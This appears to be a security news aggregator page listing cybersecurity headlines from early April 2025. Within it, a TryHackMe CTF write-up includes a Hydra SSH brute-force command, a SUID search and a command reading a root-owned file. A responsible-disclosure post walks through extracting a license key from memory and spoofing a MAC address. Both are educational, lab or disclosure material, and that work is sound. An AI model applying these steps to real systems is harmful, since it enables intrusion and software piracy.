Security News
The latest cybersecurity news, collected from a wide range of security websites.
2025-04-03 04:00:58
Open-source malware doubles, data exfiltration attacks dominate
There's been a notable shift in the types of threats targeting software developers, with a total of 17,954 open source malware packages identified in Q1 2025, according to Sonatype. (Figure: Quarterly breakdown, source: Sonatype.) The Q1 figure represents a significant decrease from the more than 34,000 malicious packages discovered last quarter, largely due to a sharp drop in security holdings packages. However, compared to the same period last year, the overall malware count more than doubled. …
by Help Net Security
2025-04-03 03:30:59
Review: Zero to Engineer
Zero to Engineer is a practical guide for anyone looking to launch a career in information technology without a traditional college degree. The book draws from the author's unlikely journey – from being expelled from high school to earning six figures in the tech industry. About the author: Terry Kim brings more than two decades of experience in the IT industry, with a career that includes roles at major technology companies such as Cisco Systems …
by Help Net Security
2025-04-02 23:48:24
How to Recover Deleted Photos from an iPhone
Accidentally deleted some photos from your iPhone? You're definitely not alone; most iPhone users have done it at…
by Hackread
2025-04-02 22:52:38
Aura or LifeLock: Who Offers Better Identity Protection in 2025?
The Growing Threat of Digital Identity Theft: Identity theft is a continuous online threat that lurks behind every…
by Hackread
2025-04-02 21:48:13
DPRK 'IT Workers' Pivot to Europe for Employment Scams
By using fake references and building connections with recruiters, some North Korean nationals are landing six-figure jobs that replenish DPRK coffers.
by Dark Reading
2025-04-02 21:38:24
New advanced FIN7 Anubis backdoor allows attackers to gain full system control on Windows
The FIN7 cybercrime group has been linked to Anubis, a Python-based backdoor that provides remote access to compromised Windows systems. The threat actor FIN7, also known as Savage Ladybug, has developed a new Python-based malware, named Anubis Backdoor, which allows attackers to gain full remote control over infected Windows systems. It executes shell commands and system […]
by Security Affairs
2025-04-02 21:01:21
In Salt Typhoon's Wake, Congress Mulls Potential Options
While the House Committee on Government Reform was looking for retaliatory options, cybersecurity experts pointed them toward building better defenses.
by Dark Reading
2025-04-02 20:29:12
Native tribe in Minnesota says cyber incident knocked out healthcare, casino systems
The Lower Sioux Indian Community warned residents on Wednesday that a cyberattack caused disruptions for the local healthcare facility, government center and casino.
by The Record
2025-04-02 20:28:04
79 Arrested as Dark Web's Largest Child Abuse Network 'Kidflix' Busted
Dark web child abuse hub 'Kidflix' dismantled in global operation. 1.8M users, 91,000+ CSAM videos exposed. 79 arrests, 39 children rescued.
by Hackread
2025-04-02 20:20:52
How to disable ACR on your TV (and why doing it makes such a big difference for privacy)
Smarter TV operating systems bring new privacy risks, with one major concern being automatic content recognition (ACR), a feature that monitors your viewing habits.
by ZDNET Security
2025-04-02 19:38:34
Rippling Turning Into a Tsunami
In today's digital workspace, SaaS applications like Slack, Google Drive, and Microsoft Teams have become the backbone of business communication and collaboration.
by Mitiga
2025-04-02 19:18:00
Google Fixed Cloud Run Vulnerability Allowing Unauthorized Image Access via IAM Misuse
Cybersecurity researchers have disclosed details of a now-patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run that could have allowed a malicious actor to access container images and even inject malicious code. "The vulnerability could have allowed such an identity to abuse its Google Cloud Run revision edit permissions in order to pull private Google Artifact …
by The Hacker News
2025-04-02 17:59:07
CISA warns of critical flaws in industrial control systems
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is sounding the alarm over a series of high-risk vulnerabilities present in industrial control systems …
by SC Media
2025-04-02 17:58:28
OpenAI's New Funding Is Bad News for AI Innovation
The record-setting $40 billion funding round is indicative of just how much cash is flooding into AI — leading startups to chase all the wrong priorities.
by ITPro Today
2025-04-02 17:58:04
Latest Ivanti bug, paired with malware, earns an alert from CISA
A recent alert from CISA builds on previous research about a vulnerability in Ivanti products that China-linked hackers have used to insert malware into networks.
by The Record
2025-04-02 17:51:21
Hacker Leaks 144GB of Royal Mail Group Data, Blames Supplier Spectos
Hacker leaks 144GB of sensitive Royal Mail Group data, including customer info and internal files, claiming access came via supplier Spectos. Investigation underway!
by Hackread
2025-04-02 17:44:31
2 Questions: Is Copilot Worth it and is Copilot Safe?
This post first appeared on blog.netwrix.com and was written by Dirk Schrader. Introduction: The Rise of AI Assistants in the Workplace. Bob Dylan's classic song The Times They Are a-Changin' feels more relevant than ever as AI continues to transform our daily lives. Today, countless computer users rely on AI assistants to boost productivity and streamline their workflows. In many ways, these tools act as copilots, offering support and …
by Netwrix
2025-04-02 17:35:11
T-Mobile settlement payouts begin this month - how much you could get
After a 2021 data breach affected 76 million customers, settlement checks are finally on the way. Here's what you can expect.
by ZDNET Security
2025-04-02 17:32:18
CrushFTP auth bypass vulnerability: Disclosure mess leads to attacks
Outpost24 analysts recently discovered a critical authentication bypass vulnerability in CrushFTP, identified as CVE-2025-31161. The vulnerability has a CVSSv3.1 score of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8). We reached out to MITRE for a CVE on 13th March 2025 and were within an agreed 90-day non-disclosure period with CrushFTP. The plan was to give users plenty of time to […]
by Outpost24
2025-04-02 17:31:26
Cybersecurity Professor Faced China-Funding Inquiry Before Disappearing, Sources Say
A lawyer for Xiaofeng Wang and his wife says they are "safe" after FBI searches of their homes and Wang's sudden dismissal from Indiana University, where he taught for over 20 years.
by WIRED Security News
2025-04-02 17:17:18
Emulating the Sophisticated Russian Adversary Seashell Blizzard
AttackIQ has released a new assessment template that emulates the various post-compromise Tactics, Techniques, and Procedures (TTPs) associated with the sabotage-motivated Russian adversary Seashell Blizzard.
by AttackIQ
2025-04-02 17:16:45
Polyglot technique for disguising malware | Kaspersky official blog
What the polyglot technique is, and how cybercriminals employ it to hide malicious files inside other file formats.
by Kaspersky
2025-04-02 17:14:20
Microsoft touts bug finds from Security Copilot
Twenty bugs in GRUB2, U-Boot and Barebox were found in an AI-assisted process.
by SC Media
2025-04-02 17:09:06
Genetic data site openSNP to close and delete data over privacy concerns
The openSNP project, a platform for sharing genetic and phenotypic data, will shut down on April 30, 2025, and delete all user submissions over privacy concerns and the risk of misuse by authoritarian governments. [...]
by BleepingComputer
2025-04-02 16:55:00
Helping Your Clients Achieve NIST Compliance: A Step-by-Step Guide for Service Providers
Introduction: As the cybersecurity landscape evolves, service providers play an increasingly vital role in safeguarding sensitive data and maintaining compliance with industry regulations. The National Institute of Standards and Technology (NIST) offers a comprehensive set of frameworks that provide a clear path to achieving robust cybersecurity practices. For service providers, adhering to NIST …
by The Hacker News
2025-04-02 16:48:20
Serial Entrepreneurs Raise $43M to Counter AI Deepfakes, Social Engineering
Adaptive is pitching a security platform designed to replicate real-world attack scenarios through AI-generated deepfake simulations.
by SecurityWeek
2025-04-02 16:16:28
DragonForce Claims to Be Taking Over RansomHub Ransomware Infrastructure
The DragonForce ransomware group claims to be taking over the infrastructure of RansomHub, the largest ransomware group in the last year, Cyble threat intelligence researchers reported in an advisory to clients today.

Cyble said the moniker behind the operators of DragonForce announced a new "project" on the RAMP forum and subsequently posted the same information on their onion-based data leak site (DLS). DragonForce said the group is launching fresh infrastructure – with two new onion links secured by CAPTCHA, similar to DragonForce's native Tor site approach – but displaying the logo of the RansomHub ransomware group.

While it's unclear if DragonForce acquired RansomHub or simply compromised it, the official RansomHub onion site has been offline since March 31, fueling speculation of a possible takeover, Cyble said.

DragonForce and RansomHub: New Relationship Unclear
DragonForce's post on RAMP read: "Hi. Don't worry RansomHub will be up soon, they just decided to move to our infrastructure! We are Reliable partners. A good example of how 'projects' work, a new option from the DragonForce Ransomware Cartel!" A postscript read: "RansomHub hope you are doing well, consider our offer! We are waiting for everyone in our ranks."

DragonForce made a similar claim on the group's Tor-based Data Leak Site (DLS) and previewed a new onion site bearing the RansomHub logo.
(Image: Preview of the new onion site posted by DragonForce on the RAMP forum, bearing the RansomHub logo.)

DragonForce Ransomware Emerges As a Significant Player
While it is unclear what the nature of the new arrangement is between the two groups, the announcement follows a March 18 announcement by DragonForce of a major expansion of its ransomware-as-a-service (RaaS) operation, Cyble said.

The group introduced a franchise-like model allowing affiliates to launch their own ransomware brands under the DragonForce Ransomware Cartel. Affiliates receive full backend support, including admin/client panels, data hosting, and 24/7 infrastructure with anti-DDoS protection, providing autonomy while maintaining centralized control.

DragonForce also rolled out technical upgrades across its ransomware lockers for ESXi, NAS, BSD, and Windows systems. Enhancements include encryption status tracking, detached execution, persistent UI messaging, and improved recovery mechanisms. The encryption engine was further hardened with two-pass header protection and a BearSSL AES-CTR implementation using external entropy sources, "signaling DragonForce's ambition to scale its operations with a more professionalized and affiliate-friendly infrastructure," Cyble said.

RansomHub Future Uncertain
While it's not clear what happened between the two ransomware groups, RansomHub put together an impressive run, besting all competitors since February 2024.
(Image: Most victims claimed by ransomware groups, Feb. 2024 to March 2025.)

RansomHub's staying power at the top has been driven by multiple factors, in Cyble's analysis, including perceptions of greater transparency than predecessor groups, predictable payouts, and well-packaged attack playbooks for affiliates.

It remains to be seen what form RansomHub and DragonForce will take on next. We will continue to follow this breaking story and update it as new information becomes available.
by The Cyber Express
2025-04-02 16:13:00
Outlaw Group Uses SSH Brute-Force to Deploy Cryptojacking Malware on Linux Servers
Cybersecurity researchers have shed light on an "auto-propagating" cryptocurrency mining botnet called Outlaw (aka Dota) that's known for targeting SSH servers with weak credentials. "Outlaw is a Linux malware that relies on SSH brute-force attacks, cryptocurrency mining, and worm-like propagation to infect and maintain control over systems," Elastic Security Labs said in a new analysis …
by The Hacker News
2025-04-02 16:10:00
Europol Dismantles Child Abuse Platform 'KidFlix,' Identifies 1,400 Suspects
In a global law enforcement operation led by Germany and supported by Europol, 'Kidflix,' one of the world's largest online child sexual exploitation platforms, has been taken offline. The three-year investigation, culminating in March 2025, resulted in 79 arrests, the identification of nearly 1,400 suspects worldwide, and the seizure of over 3,000 electronic devices. The …
by Cyber Insider
2025-04-02 16:10:00
Vulnerabilities Expose Jan AI Systems to Remote Manipulation
Vulnerabilities in open source ChatGPT alternative Jan AI expose systems to remote, unauthenticated manipulation.
by SecurityWeek
2025-04-02 16:08:30
Building a Virtual Ethical Hacking Home Lab — Part 5: Conducting Reconnaissance
An interactive guide for building your very own ethical hacking home lab using VMware …
by InfoSec Write-ups
2025-04-02 16:06:55
Jack of All Trades: Securi-Tay 2020 — Write-Up
Room Link: https://tryhackme.com/room/jackofalltrades
Mission: Pwn the Box, Capture the Flags

Ever had a website refuse to open because it's running on a port it shouldn't be? Today, we're diving into the Securi-Tay 2020 TryHackMe boot-to-root challenge. Buckle up, because this one's a rollercoaster of unconventional port placements, steganography, OSINT sleuthing, and classic privilege escalation!

Nmap Shenanigans
We start our adventure with an Nmap scan, and oh boy, what a mess:
- Apache server running on port 22 (Excuse me, wait, what? That's SSH territory!)
- SSH running on port 80 (Who hurt you, admin? That's HTTP's usual playground.)
Clearly, this box is playing mind games with us. But fear not! Let's navigate through this organized chaos.

Firefox Says NOPE!
Trying to open the website? Nope. Firefox slams the door in our face. Turns out, it doesn't like serving websites on port 22 (probably because, you know, SSH exists there?). Circumventing this madness:
1. Tell Firefox to chill by bypassing the block in Firefox settings: open a new tab and type about:config, search for network.security.ports.banned.override, add 22 as a string and save. (Remember to remove this later, unless you enjoy security nightmares.)
2. Use cURL like a true hacker:
curl -v http://10.10.144.31:22

Decoding the Breadcrumbs
I also found some base64-encoded text which, after decoding, revealed:
The website was plastered with mentions of someone named "Jack", subtle as a sledgehammer. Nice! Time to log in and claim our prize! Or so I thought… DENIED. Classic CTF bait and switch!

Source Code Digging — The Hidden Secret
I took a peek into recovery.php (aka the login page) and found another encoded string. This time, it's Base32. Decode sequence:
echo "<text>" | base32 -d | xxd -r -p
It spat out something resembling a shortened URL. Bit.ly? But it was encrypted somehow.

Time for some OSINT!
Remembering a hint about "Johny Graves" and "Crypto Job Hunting", it was OSINT time. After some detective work, I found a MySpace profile (yes, MySpace, the land of the forgotten). The owner, Johny Graves, was bragging about his ROT13 encryption skills. Oh, Johny, you absolute genius. Using CyberChef, I decrypted the URL. It led me to a Wikipedia page about Stegosauria… Suspicious? You bet!

Steganography — Dino Picture Lies to Us!
The hint screamed steganography, but my first guess, the dino image, was WRONG. Instead, the header image contained CMS credentials:
uname: j_____
passwd: T_____
Logged in, and BAM! A PHP-based command execution page awaits.

PHP Command Injection — Say Hello to Reverse Shell!
This screamed PHP command injection vulnerability: the application was likely using exec() to evaluate commands passed to a "cmd" parameter. Time for a reverse shell!

Privilege Escalation — Jack's Password List
Moving up the privilege chain, I discovered a password list in Jack's home directory, perfect for SSH brute-forcing. Hydra to the rescue!
hydra -l jack -P passwd_list -s 80 ssh://10.10.144.31 -vv
Boom! Found valid SSH creds:
uname: j___
passwd: I____
Logged in via SSH, and finally got the user flag. But wait, the flag was hidden inside an image file?! Oh, come on! With a bit of finagling to transfer the file to my machine, I extracted the user flag.

Root Privileges — Time to Finish This!
Jack wasn't in sudoers, so we needed another way. A quick SUID bit check led us to an interesting binary:
find / -type f -perm -4000 2>/dev/null
Found strings with the SUID bit set. Oh no, not the classic mistake! This meant I could read any file on the system with root privileges, including the root flag file.
strings /root/root.txt
And just like that… ROOTED!

Flags Secured!
User Flag: securi{}
Root Flag: securi{}

Lessons Learned
1. Ports are weird. Don't trust them.
2. Browsers hate unconventional ports.
3. Check the source code, always.
4. OSINT can lead you to MySpace (yep, it's still alive).
5. Steganography is sneaky.
6. SUID binaries = potential root access.

Final Thoughts
This challenge was an absolute blast. From unconventional ports to OSINT, steganography, and privilege escalation, it had everything. What stood out is how the authors string together multiple techniques in a logical progression, testing not just individual skills but also your ability to connect the dots. Until next time, stay curious, stay hacking!

Originally published in InfoSec Write-ups on Medium.
by InfoSec Write-ups
2025-04-02 16:06:35
Step-by-Step Guide to Set Up Shuffle SOAR
Hello, my digital adventurers! In this article, I'll show you the process of downloading and configuring your own Shuffle SOAR to automate…
by InfoSec Write-ups
2025-04-02 16:06:21
How to Find Your First Bug
by InfoSec Write-ups
2025-04-02 16:04:59
HackfinityBattle part 2
NOTEPAD ONLINE …
by InfoSec Write-ups
2025-04-02 16:02:48
Bypassing License Validation in a Desktop Application — A Deep Dive into a Real-World Exploit
Author: Viraj Mota
Application Type: Commercial Thick Client (Desktop)
Severity: High
Business Impact: Critical

Summary
A critical security flaw was discovered in a commercial desktop application that allowed a user to bypass the license key validation mechanism. This vulnerability enabled attackers to extract and reuse license keys on unauthorized machines by spoofing hardware identifiers. This blog outlines a technical step-by-step walkthrough of the exploit chain, how it works, and how to mitigate such vulnerabilities in commercial software.

What Was the Vulnerability?
The application used a host-based license validation mechanism, where each license key was tied to a unique hardware identifier (MAC address). However, attackers could:
- Extract the license key from process memory,
- Identify the correct MAC address due to detailed error messages,
- Spoof the MAC address, and
- Reuse the license key on a different machine.
This completely breaks the licensing model.

Exploitation Steps
Let's call:
Machine A — the attacker's system
Machine B — the licensed system (victim)

Step 1: Extracting the License Key from Memory
Using memory analysis tools like Process Hacker, the attacker inspects a running process (javaw.exe) and filters memory strings to locate sensitive data.
Result: The license key appears in plaintext in memory. This suggests a lack of in-memory encryption or obfuscation, a common mistake in thick client apps.

Step 2: Attempt to Use Key on Unauthorized System
The attacker tries to activate the application on Machine A using the license key from Machine B. The activation fails, but the error message leaks the expected MAC address, saying something like:
Licensed Host ID was not found on this machine [MAC ID REDACTED]
This reveals exactly what system detail to spoof.

Step 3: Spoofing the Victim's MAC Address
The attacker changes the MAC address of their network adapter to match the one expected by the license. On Windows:
- Go to Device Manager → Network Adapter → Advanced → Locally Administered Address
- Insert the [Victim MAC ID — REDACTED] from the error message
- Disable other adapters
- Restart the system
Now, Machine A is impersonating Machine B from a licensing perspective.

Step 4: Successful License Reuse
With the spoofed MAC address in place, the attacker successfully activates the software using the stolen license key.
Impact: This works for both trial and paid licenses, exposing the software to piracy, license abuse, and lost .
Note: More could be done, such as automating the discovery of valid license keys to increase the impact, but due to security and legal terms and conditions I was unable to go further.

Root Causes
- License key stored unencrypted in memory
- Verbose error messages leaking system information
- Binding based on spoofable hardware identifiers
- No telemetry or anti-tamper checks in place

Recommendations for Developers
1. Secure In-Memory Data: Use encryption or tokenization for sensitive keys; avoid storing plaintext keys during runtime.
2. Avoid Verbose Error Messages: Never reveal host-specific identifiers (like MAC, HWID, etc.); use generic errors like "License validation failed".
3. Bind to Strong Identifiers: Use TPM, motherboard UUID, or hardware-based tokens; combine multiple properties for a robust fingerprint.
4. Revoke and Reissue: Allow the admin panel to revoke compromised license keys; revalidate licenses on major environment changes.
5. Audit and Monitor: Track activations by IP, region, and system fingerprint; alert on anomalies (e.g., the same key used across many devices).

Lessons Learned
This vulnerability demonstrates how multiple low-risk issues, like information disclosure, poor encryption, and system spoofing, can chain together into a critical exploit.

The Fix
This issue was patched in version X.X.X, where:
- License validation logic was hardened
- MAC spoofing was made ineffective
- Error messages were cleaned up
- Telemetry features were introduced

Responsible Disclosure
This vulnerability was responsibly reported and documented by Viraj Mota. We encourage all researchers to practice coordinated disclosure, allowing vendors to patch before public release.

UPDATE: Introducing a dedicated, practical Udemy Thick Client Pentest study course (more than just a blog): https://www.udemy.com/course/thick-client-pentest-modern-approaches-2024complete

Final Thoughts
Protecting license enforcement is both a technical and strategic challenge. It's not just about revenue; it's about trust and fairness. If you're developing a commercial product, treat license validation like any other security system: test it, break it, and fix it before someone else does.

Originally published in InfoSec Write-ups on Medium.
by InfoSec Write-ups
2025-04-02 15:58:48
From Obsolete to Innovative: How LTFS Turned LTO Tape into a Thrilling Storage Adventure
Once a relic of the past, Linear Tape-Open (LTO) tape storage was often seen as the dusty corner of enterprise IT — a backup solution…
by InfoSec Write-ups
2025-04-02 15:58:18
PATH HIJACKING TECHNIQUE THAT HELPS IN PRIVILEGE ESCALATION
This article is about privilege escalation. In it, I'll give you a technique that helps to gain root access on the machine. OR…
by InfoSec Write-ups
2025-04-02 15:47:54
Verizon Call Filter API flaw exposed customers' incoming call history
A vulnerability in Verizon's Call Filter feature allowed customers to access the incoming call logs for another Verizon Wireless number through an unsecured API request. [...]
by BleepingComputer
2025-04-02 15:32:52
Verizon Call Filter App Flaw Exposed Call Logs of Millions of Customers
A critical vulnerability in the Verizon Call Filter app for iOS exposed incoming call records of potentially all Verizon Wireless customers, allowing unauthorized access to sensitive metadata without authentication or device compromise. The flaw was discovered by independent security researcher Evan Connelly on February 22, 2025, and responsibly disclosed to Verizon the same day. The …
by Cyber Insider
2025-04-02 15:30:00
How SSL Misconfigurations Impact Your Attack Surface
When assessing an organization's external attack surface, encryption-related issues (especially SSL misconfigurations) receive special attention. Why? Their widespread use, configuration complexity, and visibility to attackers as well as users make them more likely to be exploited. This highlights how important your SSL configurations are in maintaining your web application security and …
by The Hacker News
2025-04-02 15:29:40
Fusing Vulnerability and Threat Data: Enhancing the Depth of Attack Analysis
This blog highlights how vulnerability data, collected using Cado's new vulnerability discovery feature, can be fused with threat data to help deepen the understanding of an attack, as well as guide remediation efforts.
by Darktrace
2025-04-02 15:28:50
Cyberhaven Banks $100 Million in Series D, Valuation Hits $1 Billion
Cyberhaven bags $100 million in funding at a billion-dollar valuation, a sign that investors remain bullish on data security startups.
by SecurityWeek
2025-04-02 15:20:00
A new security fund opens up to help protect the fediverse
A new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.
by TechCrunch
2025-04-02 15:15:26
CSAM platform Kidflix shut down by international operation
A multi-year operation against the child sexual abuse material (CSAM) platform Kidflix has led to dozens of arrests and the seizure of tens of thousands of illegal videos, Europol said Wednesday.
by The Record
2025-04-02 15:06:07
China's FamousSparrow APT Hits Americas with SparrowDoor Malware
China-linked APT group FamousSparrow hits targets in the Americas using upgraded SparrowDoor malware in a new cyberespionage campaign, ESET reports.
by Hackread
2025-04-02 14:26:25
Western cyber aid to Ukraine faces strain as Russia's war drags on
As the war between Russia and Ukraine continues, Western cyber support is waning, raising growing concerns about the long-term effectiveness of these efforts.
by The Record
2025-04-02 14:24:54
GitHub expands security tools after 39 million secrets leaked in 2024
Over 39 million secrets like API keys and account credentials were leaked on GitHub throughout 2024, exposing organizations and users to significant security risks. [...]
by BleepingComputer
2025-04-02 14:22:35
Threat actor using vishing, MS QuickAssist and Teams can potentially drop ransomware
The bad actor's TTPs closely align to the Storm-1811 threat group identified last year by Microsoft, say Ontinue researchers.
by SC Media
2025-04-02 14:11:12
Canon Printer Drivers Flaw Could Let Hackers Run Malicious Code
A critical vulnerability (CVE-2025-1268) in Canon printer drivers allows remote code execution. See which drivers are affected and how to patch them.
by Hackread
2025-04-02 14:06:54
AI Giving Rise of the 'Zero-Knowledge' Threat Actor
The rise of zero-knowledge threat actors powered by AI marks a turning point in the business of cybercrime, where sophisticated attacks are no longer confined to skilled attackers.
by SecurityWeek
2025-04-02 14:02:31
Microsoft adds hotpatching support to Windows 11 Enterprise
Microsoft has announced that hotpatch updates are now available for business customers using Windows 11 Enterprise 24H2 on x64 (AMD/Intel) systems, starting today. [...]
by BleepingComputer
2025-04-02 14:00:00
Getting Started with AI Hacking: Part 1
You may have read some of our previous blog posts on Artificial Intelligence (AI). We discussed things like using PyRIT to help automate attacks. We also covered the dangers of […]
by Black Hills Information Security
2025-04-02 14:00:00
How an Interdiction Mindset Can Help Win War on Cyberattacks
The US military and law enforcement learned to outthink insurgents. It's time for cybersecurity to learn to outsmart and outmaneuver threat actors with the same framework.
by Dark Reading
2025-04-02 13:47:39
U.S. CISA adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added an Apache Tomcat path equivalence vulnerability, tracked as CVE-2025-24813, to its Known Exploited Vulnerabilities (KEV) catalog. The Apache Tomcat vulnerability CVE-2025-24813 was recently disclosed and is being actively exploited just 30 […]
by Security Affairs
2025-04-02 13:44:46
North Korean IT worker scam spreading to Europe after US law enforcement crackdown
North Korea's IT worker scam has expanded widely into Europe after years of focusing on U.S. companies, according to new research.
by The Record
2025-04-02 13:43:02
Google DeepMind Unveils Framework to Exploit AI's Cyber Weaknesses
DeepMind found that current AI frameworks are ad hoc, not systematic, and fail to provide defenders with useful insights.
by SecurityWeek
2025-04-02 13:37:10
"Nudify" deepfakes stored unprotected online
A generative AI nudify service has been found storing explicit deepfakes in an unprotected cloud database.
by Malwarebytes Labs
2025-04-02 13:37:08
Travelers Cyber Risk Services reduces the risk of a cyberattack
The Travelers Companies announced Travelers Cyber Risk Services, a suite of capabilities added to all cyber liability policies designed to help lower both the risk of a cyberattack and the cost to recover from one. In addition to always-on threat monitoring and tailored alerts, key benefits of Travelers Cyber Risk Services include: Cyber Risk Dashboard: This 24/7 tool gives consumers the ability to monitor risks and track progress over time, view customized recommendations ranked by …
by Help Net Security
2025-04-02 13:36:38
Brinker Named Among “10 Most Promising Defense Tech Startups of 2025”
Delaware, USA, 2nd April 2025, CyberNewsWire
by Hackread
2025-04-02 13:36:30
Trump’s national security adviser reportedly used his personal Gmail account to do government work
Michael Waltz used his personal Gmail to share "potentially exploitable" information, per the report.
by TechCrunch
2025-04-02 13:30:47
Hack The Box enhances its portfolio with the addition of Vulnlab’s content, addressing growing demands for red teaming skills
by Hack The Box Blog
2025-04-02 13:23:18
North Korea’s IT Operatives Are Exploiting Remote Work Globally
The global rise of North Korean IT worker infiltration poses a serious cybersecurity risk—using fake identities, remote access, and extortion to compromise organizations. The post North Korea’s IT Operatives Are Exploiting Remote Work Globally appeared first on SecurityWeek.
by SecurityWeek
2025-04-02 13:22:44
Gootloader Malware Resurfaces in Google Ads for Legal Docs
Attackers target a familiar industry, law professionals, by hiding the infostealer in ads delivered via Google-based malvertising.
by Dark Reading
2025-04-02 13:00:44
How to map and manage your cyber attack surface with EASM
In today’s digital landscape, understanding your organization’s attack surface is crucial for maintaining robust cybersecurity. To effectively manage and mitigate the cyber-risks hiding in modern attack surfaces, it’s important to adopt an attacker-centric approach. In this article, we will be diving deeper into a company’s attack surface, what might have been forgotten and overlooked during the day-to-day rush and how cybersecurity professionals can regain the momentum and overview with the help of external attack surface … More → The post How to map and manage your cyber attack surface with EASM appeared first on Help Net Security.
by Help Net Security
2025-04-02 13:00:16
More From Our Main Blog: The Overlooked Six | AWS Security Blind Spots
In this guest blog post, learn about six commonly missed AWS 'blind spots' that could lead to risk in your cloud infrastructure. The post The Overlooked Six | AWS Security Blind Spots appeared first on SentinelOne.
by SentinelOne
2025-04-02 12:54:10
Compliance Plus Library Reaches 800 Pieces of Content
It seems like only yesterday that we launched the Compliance Plus training library as a result of customers asking us to address their needs beyond security awareness training.
by KnowBe4
2025-04-02 12:54:06
Meet the future of AppSec: DAST-first application security
Being DAST-first means starting application security with validated, real-world testing that prioritizes actual exploitable risks. Invicti’s DAST-first platform leads the way towards integrating all AppSec efforts within a scalable and integrated environment that gets your teams fixing what matters most—faster and with less noise. The post Meet the future of AppSec: DAST-first application security appeared first on Invicti.
by Invicti
2025-04-02 12:53:00
iOS 18.4 update draining your iPhone's battery? Try these 6 fixes
iOS 18.4 is here, and for some, it's causing major battery drain. Here are my top tips to get to the root of the issue and restore your iPhone's power ASAP.
by ZDNET Security
2025-04-02 12:50:56
The state of Falco: A year of progress since CNCF graduation
It’s been just over a year since open source Falco graduated from the Cloud Native Computing Foundation® (CNCF) during KubeCon... The post The state of Falco: A year of progress since CNCF graduation appeared first on Sysdig.
by Sysdig
2025-04-02 12:34:32
Utimaco releases Quantum Protect solution
Utimaco launched Quantum Protect, the Post Quantum Cryptography application package for its u.trust General Purpose HSM (Hardware Security Modules) Se-Series. The advent of quantum computers poses a threat to today’s cryptographic landscape. A cryptanalytically relevant quantum computer that could break common public key schemes such as RSA or ECC is expected by 2030. That may seem far away, but organizations need to plan their migration to Post Quantum Cryptography (PQC) now in order to stay … More → The post Utimaco releases Quantum Protect solution appeared first on Help Net Security.
by Help Net Security
2025-04-02 12:34:08
Royal Mail investigates data leak claims, no impact on operations
Royal Mail is investigating claims of a security breach after a threat actor leaked over 144GB of data allegedly stolen from the company's systems. [...]
by BleepingComputer
2025-04-02 12:26:24
Fake Booking.com emails target hotels
A new phishing campaign is using a famous brand to compromise hotels.
by ThreatDown
2025-04-02 12:22:27
Royal Mail Group Breach Exposes 144GB of Sensitive Customer Data
A new data breach has impacted the Royal Mail Group, with 144GB of sensitive data leaked on March 31, 2025, by a hacker using the alias “GHNA.” The attack, linked to a long-dormant infostealer infection from 2021, is the second major incident involving Spectos, the same third-party service provider implicated in last week's Samsung Tickets … The post Royal Mail Group Breach Exposes 144GB of Sensitive Customer Data appeared first on CyberInsider.
by Cyber Insider
2025-04-02 12:22:00
FIN7 Deploys Anubis Backdoor to Hijack Windows Systems via Compromised SharePoint Sites
The financially motivated threat actor known as FIN7 has been linked to a Python-based backdoor called Anubis (not to be confused with an Android banking trojan of the same name) that can grant them remote access to compromised Windows systems. "This malware allows attackers to execute remote shell commands and other system operations, giving them full control over an infected machine," Swiss
by The Hacker News
2025-04-02 12:10:05
ImageRunner Flaw Exposed Sensitive Information in Google Cloud
Google has patched a Cloud Run vulnerability dubbed ImageRunner that could have been exploited to gain access to sensitive data. The post ImageRunner Flaw Exposed Sensitive Information in Google Cloud appeared first on SecurityWeek.
by SecurityWeek
2025-04-02 12:02:01
Sysdig and Camptocamp announce partnership for strong cloud security based on open source
The cloud has become the hub of modern data traffic. It offers organizations of all sizes unprecedented speed, flexibility, and... The post Sysdig and Camptocamp announce partnership for strong cloud security based on open source appeared first on Sysdig.
by Sysdig
2025-04-02 11:54:00
Clicked on a phishing link? Take these 7 steps ASAP to protect yourself
Phishing scams are becoming brutally effective, and even technically sophisticated people can be fooled. Here's how to limit the damage immediately and what to do next.
by ZDNET Security
2025-04-02 11:51:30
Google is making sending end-to-end encrypted emails easy
Sending end-to-end encrypted (E2EE) emails from Gmail enterprise accounts is about to become much easier than it is now, Google has announced on Tuesday. The company will first make available this simplified capability to users who want to send E2EE emails to other Gmail users in their own organization, and will extend it in the coming weeks to include E2EE emails to external enterprise or personal Gmail inboxes. Finally, later this year, they will be … More → The post Google is making sending end-to-end encrypted emails easy appeared first on Help Net Security.
by Help Net Security
2025-04-02 11:30:47
Apple Backports Zero-Day Patches to Older Devices in Latest Security Update
Apple has released a series of critical security updates to address vulnerabilities that were actively exploited as zero-day threats. These updates include backported patches for older versions of iOS, iPadOS, macOS, and watchOS, aiming to secure devices that may still be running outdated software. A key focus of these updates is the backporting of zero-day patches to older devices, reflecting the ongoing efforts to mitigate risks across a broad range of hardware. Notable vulnerabilities include CVE-2025-24200 and CVE-2025-24201, both of which were actively exploited before patches were issued.

Backporting Zero-Day Fixes
The vulnerability CVE-2025-24200 allowed mobile forensic tools to bypass USB Restricted Mode on locked devices, a feature designed to prevent unauthorized data access via USB ports. This flaw was addressed with the release of iOS 18.3.1, iPadOS 18.3.1, and macOS 17.7.5 on February 10, 2025, with backports provided for older versions such as iOS 16.7.11 and iPadOS 16.7.11. Similarly, CVE-2025-24201, which affected the WebKit engine, enabled attackers to break out of the Web Content sandbox through specially crafted web content. This vulnerability was exploited in several attacks, prompting Apple to release fixes in iOS 18.3.2, iPadOS 18.3.2, and macOS Sequoia 15.3.2 on March 11, 2025. Older devices received updates through versions like iOS 16.7.11 and corresponding macOS releases.

Apple Addresses Other Vulnerabilities and Fixes
In addition to the zero-day flaws, Apple addressed CVE-2025-24085, a privilege escalation issue within the Core Media framework. This vulnerability was patched in the January 2025 updates for iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, and tvOS 18.3, with backports available in iPadOS 17.7.6 and macOS Sonoma 14.7.5. The updates also cover a range of other security flaws across various system components, including Safari, CoreAudio, Maps, Calendar, and more. These patches aim to enhance the overall security posture of Apple’s ecosystem, addressing risks that could lead to data breaches, system crashes, or unauthorized access.

Security Content of Latest Updates
